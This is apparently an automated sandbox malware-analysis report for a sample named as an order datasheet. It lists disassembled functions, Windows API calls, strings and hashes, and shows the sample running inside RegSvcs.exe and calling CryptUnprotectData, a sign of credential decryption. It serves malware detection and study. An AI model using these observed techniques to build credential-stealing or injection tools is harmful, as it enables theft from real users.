API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: 82a1c9d27e223d2f7ed7079b8632d6de5b9a1da43eacd26cd441cc06c39dd239
Instruction ID: 81dc30cc072f3deefef443c904c18e71e80dea269d8e60983bf0ea62b9438a91
Opcode Fuzzy Hash: 82a1c9d27e223d2f7ed7079b8632d6de5b9a1da43eacd26cd441cc06c39dd239
Instruction Fuzzy Hash: D331B025A0DB4682EA18EB59B4402B5E3A1AFAA7A0F840431DE5D47798FF7CE455C720

Function 00007FF7BD5F33B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BD5FCE60: GetCurrentThreadId.KERNEL32 ref: 00007FF7BD5FCE64

GetCurrentProcess.KERNEL32 ref: 00007FF7BD5F33F6
GetCurrentThread.KERNEL32 ref: 00007FF7BD5F33FE
DuplicateHandle.KERNEL32 ref: 00007FF7BD5F3422

Part of subcall function 00007FF7BD5FE660: VirtualQuery.KERNEL32 ref: 00007FF7BD5FE692

RaiseFailFastException.KERNEL32 ref: 00007FF7BD5F3450

Strings

, xrefs: 00007FF7BD5F3464

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
Opcode ID: f93380af70f62f54b1a1923f466ad22b5765e184aabf6e9d0340985e501fe6c0
Instruction ID: 2d17311070b0cbc3498b67c340ce10f3682589336f5e125ed0813643e0110335
Opcode Fuzzy Hash: f93380af70f62f54b1a1923f466ad22b5765e184aabf6e9d0340985e501fe6c0
Instruction Fuzzy Hash: DC116D72A0CB818AD764AF19A4411DAB351FB427B8F540335EBBD4B6DADF38D1818700

Function 00007FF7BD627C50 Relevance: 7.6, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7BD627D05
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD627D5E
EnterCriticalSection.KERNEL32 ref: 00007FF7BD627E21
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD627E42
EnterCriticalSection.KERNEL32 ref: 00007FF7BD627E85
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD627EA6

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
Instruction ID: 62c6265d22ed3a1dae4cfe741889b7f768b50daf7bdcf86d83963433d2c5b885
Opcode Fuzzy Hash: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
Instruction Fuzzy Hash: 12619521E0DB4684EA58AB19E8402B9A352FF667E5FC40431EB4C43769FFBCE4658760

Function 00007FF7BD622F80 Relevance: 7.6, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7BD623025
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD62307D

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
Instruction ID: 78cce732c97e66fb4f142fc41c7080a72419202bc13a8e2e8548071d3818be4c
Opcode Fuzzy Hash: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
Instruction Fuzzy Hash: 4C513321D0CB4680EA58AB18E8413B9F3A6FF66794F840135DB8D43769FFBCD0658760

Function 00007FF7BD5F3EB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF7BD5F3F50
RaiseFailFastException.KERNEL32 ref: 00007FF7BD5F4059
RaiseFailFastException.KERNEL32 ref: 00007FF7BD5F4096

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF7BD5F3F3A

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
Instruction ID: ca5d71822c0cb505145001621d1058e6f9c1a23aefc7ad5b221c11400cf5a0c3
Opcode Fuzzy Hash: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
Instruction Fuzzy Hash: 71519521A0DA4281FE58AB1DE4803F9A3A1EF6A794F844431DF1D4B798FF6CE4958310

Function 00007FF7BD631970 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF7BD60C7EB), ref: 00007FF7BD6319EB
SwitchToThread.KERNEL32(?,?,?,00007FF7BD60C7EB), ref: 00007FF7BD631A92
SwitchToThread.KERNEL32(?,?,?,00007FF7BD60C7EB), ref: 00007FF7BD631AA8

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
Instruction ID: 1b0aad9a5deb9891a6fe39dc41ad39cc6ba4a5e0155ab4645625dd74c43195c9
Opcode Fuzzy Hash: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
Instruction Fuzzy Hash: F041DB32F0D68585EB585E2DD140279F291EB22BE9F98813ADB4E467CDFE7CE4409720

Function 00007FF7BD5FCD10 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BD5F3541), ref: 00007FF7BD5FCD44
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BD5F3541), ref: 00007FF7BD5FCD4E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BD5F3541), ref: 00007FF7BD5FCD6D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BD5F3541), ref: 00007FF7BD5FCD81

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
Instruction ID: 59d7200286f4cd46d335d67dff19b542ab25606f76ef1be36637b93d31555a50
Opcode Fuzzy Hash: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
Instruction Fuzzy Hash: 86118C39A1C69582D7289B1BB45417EE661FB99784F900139EB8E8BB99EF3CD4008B50

Function 00007FF7BD65BA10 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7BD65BA3C
GetCurrentThreadId.KERNEL32 ref: 00007FF7BD65BA4A
GetCurrentProcessId.KERNEL32 ref: 00007FF7BD65BA56
QueryPerformanceCounter.KERNEL32 ref: 00007FF7BD65BA66

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
Instruction ID: f76ab324ed157915c3da0030c03ad33bd6d716a1121658f420e93c31523cc938
Opcode Fuzzy Hash: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
Instruction Fuzzy Hash: C8115122B18F058AEB04EF65E8542B973A4F729758F440E31EB1D87768EF78D1548350

Function 00007FF7BD65CF30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD65C243), ref: 00007FF7BD65CF80
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD65C243), ref: 00007FF7BD65CFC1

Strings

csm, xrefs: 00007FF7BD65CFAE

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
Instruction ID: f53e772559ffebd57d41d803ccc50ecf6257ccad431bba50061ad0c36b8eb62b
Opcode Fuzzy Hash: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
Instruction Fuzzy Hash: B4115E3AA1CB4582EB249F19F400259B7E1FB99B98F594234EF8D07758EF3DC5918710

Function 00007FF7BD5FE4E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF7BD5FDD43,?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FE51B
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF7BD5FDD43,?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FE558

Strings

HeapVerify, xrefs: 00007FF7BD5FE4EF

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: _stricmpstrtoull
String ID: HeapVerify
API String ID: 4031153986-2674988305
Opcode ID: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
Instruction ID: fe7ebd0b36783d89620605eb926666c713322eaa0a9f7dbe5946d000cf8f87f9
Opcode Fuzzy Hash: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
Instruction Fuzzy Hash: 96015631A0E64189D758AF19E9800ADF361FB59794FD95035DB5D0375DFF3CD4818610

Function 00007FF7BD615A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000080,00007FF7BD615BEF,?,?,?,00007FF7BD6233BB), ref: 00007FF7BD615ABD
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF7BD615BEF,?,?,?,00007FF7BD6233BB), ref: 00007FF7BD615B12
EnterCriticalSection.KERNEL32(?,?,00000080,00007FF7BD615BEF,?,?,?,00007FF7BD6233BB), ref: 00007FF7BD615B2F
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF7BD615BEF,?,?,?,00007FF7BD6233BB), ref: 00007FF7BD615B4C

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
Instruction ID: 384c5a030bb21bf8465802801da93ef64e0f155675c045b09311418381fa928a
Opcode Fuzzy Hash: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
Instruction Fuzzy Hash: A321AB31E1C60641EA08AF19E850279A756EF267F5FC41235EB6C437DDEF6CD0668350

Analysis Process: RegSvcs.exePID: 6648, Parent PID: 3272COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	88
Total number of Limit Nodes:	11

Executed Functions

Function 06D18778 Relevance: 12.4, Strings: 8, Instructions: 2405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D18C40
$^q, xrefs: 06D18BDC
$^q, xrefs: 06D18C17
$^q, xrefs: 06D18BE8
$^q, xrefs: 06D18B89
$^q, xrefs: 06D18C0B
$^q, xrefs: 06D18C34
$^q, xrefs: 06D18B95

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 39859f17f31baa657e98fa4576acfa1e625701a9a75995d2a60777559257c639
Instruction ID: adc530d1db1d90b432123b1b74fc90ee05b3a93593ac645c1e81c3acccc8f051
Opcode Fuzzy Hash: 39859f17f31baa657e98fa4576acfa1e625701a9a75995d2a60777559257c639
Instruction Fuzzy Hash: 0B332E31D107199ECB11EF68C8906ADF7B1FF99300F15C79AE459AB211EB70AAC5CB81

Function 06D1C3E8 Relevance: 8.3, Strings: 6, Instructions: 824COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D1CEF7
$^q, xrefs: 06D1CE9E
$^q, xrefs: 06D1CED3
$^q, xrefs: 06D1CEEB
$^q, xrefs: 06D1CEAA
$^q, xrefs: 06D1CEC7

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: ff800086c155d8c0cb3a795d01bfed342a3e5f0d118c89d867f6566108f627a5
Instruction ID: e28fcb96dd7b4b424bfe3bf16c21ef1b98833094fce60ee312de30cb737a40b2
Opcode Fuzzy Hash: ff800086c155d8c0cb3a795d01bfed342a3e5f0d118c89d867f6566108f627a5
Instruction Fuzzy Hash: F8728530E502199FDB64DF78D8806ADF7B2FF89300F10866AD409AB254EB74ED85CB91

Function 06D14DA0 Relevance: 2.8, Instructions: 2799COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2cebb0f2e1379691059f27b6ed932f38fa860a76965a95553bda1625e793bf
Instruction ID: b7cf7bd065308335896c04eb07a2f9c12fe3c3c5a5791a6c0bb96177013a5da8
Opcode Fuzzy Hash: 1e2cebb0f2e1379691059f27b6ed932f38fa860a76965a95553bda1625e793bf
Instruction Fuzzy Hash: 30530831D10B1A8ACB51EF68C8445A9F7B1FF99300F55D79AE4587B221FB70AAC4CB81

Function 06D3F5A8 Relevance: 1.6, APIs: 1, Instructions: 58
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 06D3F615

Memory Dump Source

Source File: 00000003.00000002.1980771783.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d30000_RegSvcs.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 52158cd69cbf910e6f113d2f93bfa699afda2ea76a0b909e9cc05ffb5eef922c
Instruction ID: 9f63b567f36527d23030b6dd1c6851569768838d0fb8e1424f5732fb9e144fec
Opcode Fuzzy Hash: 52158cd69cbf910e6f113d2f93bfa699afda2ea76a0b909e9cc05ffb5eef922c
Instruction Fuzzy Hash: 78216A76800249EFCB10DF99C845BEEBFF5EF48320F148419E518A7210D739A554DFA5

Function 06D3EDA4 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 06D3F615

Memory Dump Source

Source File: 00000003.00000002.1980771783.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d30000_RegSvcs.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a150eb646192810d7ec8573764dc0d8f87fa57b3cef477ca0fa5458f10418f8b
Instruction ID: b252dc01d014294893fc2f988d941f029135bbac9591cfaab731126e1faa0d2c
Opcode Fuzzy Hash: a150eb646192810d7ec8573764dc0d8f87fa57b3cef477ca0fa5458f10418f8b
Instruction Fuzzy Hash: B71156B2800259DFCB10DF99C804BEEBFF4EB48320F148419E914A7220C339A954DFA4

Function 06D1B4CB Relevance: 1.2, Instructions: 1236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324478979e2a410b02c3cac50cd58da493068488967ff56b1435e0a6421ae8de
Instruction ID: 4db46e31369b2780b6faa63c3a3739157787ecee03161f144b351e2f72cd7441
Opcode Fuzzy Hash: 324478979e2a410b02c3cac50cd58da493068488967ff56b1435e0a6421ae8de
Instruction Fuzzy Hash: 5BB27834E002049FDB64DB68D584B6DB7F2EB48314F5488AAD449EF361DBB5EC86CB81

Function 06D1F071 Relevance: 3.9, Strings: 3, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06D1F0AB
\Ocq, xrefs: 06D1F25A
XPcq, xrefs: 06D1F1D1

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 2266d67035f081f15ad4d05de2ec51d540fcf41b278a3ef1ef5364c0164f5c9e
Instruction ID: 162ef2e91110060c6e7078e6b3ac7dfd2b546373f4ee0fb01f9f71488ede4fc1
Opcode Fuzzy Hash: 2266d67035f081f15ad4d05de2ec51d540fcf41b278a3ef1ef5364c0164f5c9e
Instruction Fuzzy Hash: 1B617270F00208AFDF559FA9D8547AEBAF7EF88700F208429D105EB395DBB58C458B95

Function 06D42E28 Relevance: 2.9, Strings: 2, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 06D42E69
Te^q, xrefs: 06D43197

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 4382c5803e16870a21cbcace0f5fcbf65b88dde8e6b5035ae28e6f035b932bae
Instruction ID: 3e528f3917f29b3ac33c969869ec7b6327719895643594a26f1945dcd3551b1b
Opcode Fuzzy Hash: 4382c5803e16870a21cbcace0f5fcbf65b88dde8e6b5035ae28e6f035b932bae
Instruction Fuzzy Hash: 29E17B30B002158FDB68EBA9C484B6DB7B2FF89700F604569E406EB365CB75ED46CB91

Function 027FC670 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1948182225.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27f0000_RegSvcs.jbxd

Similarity

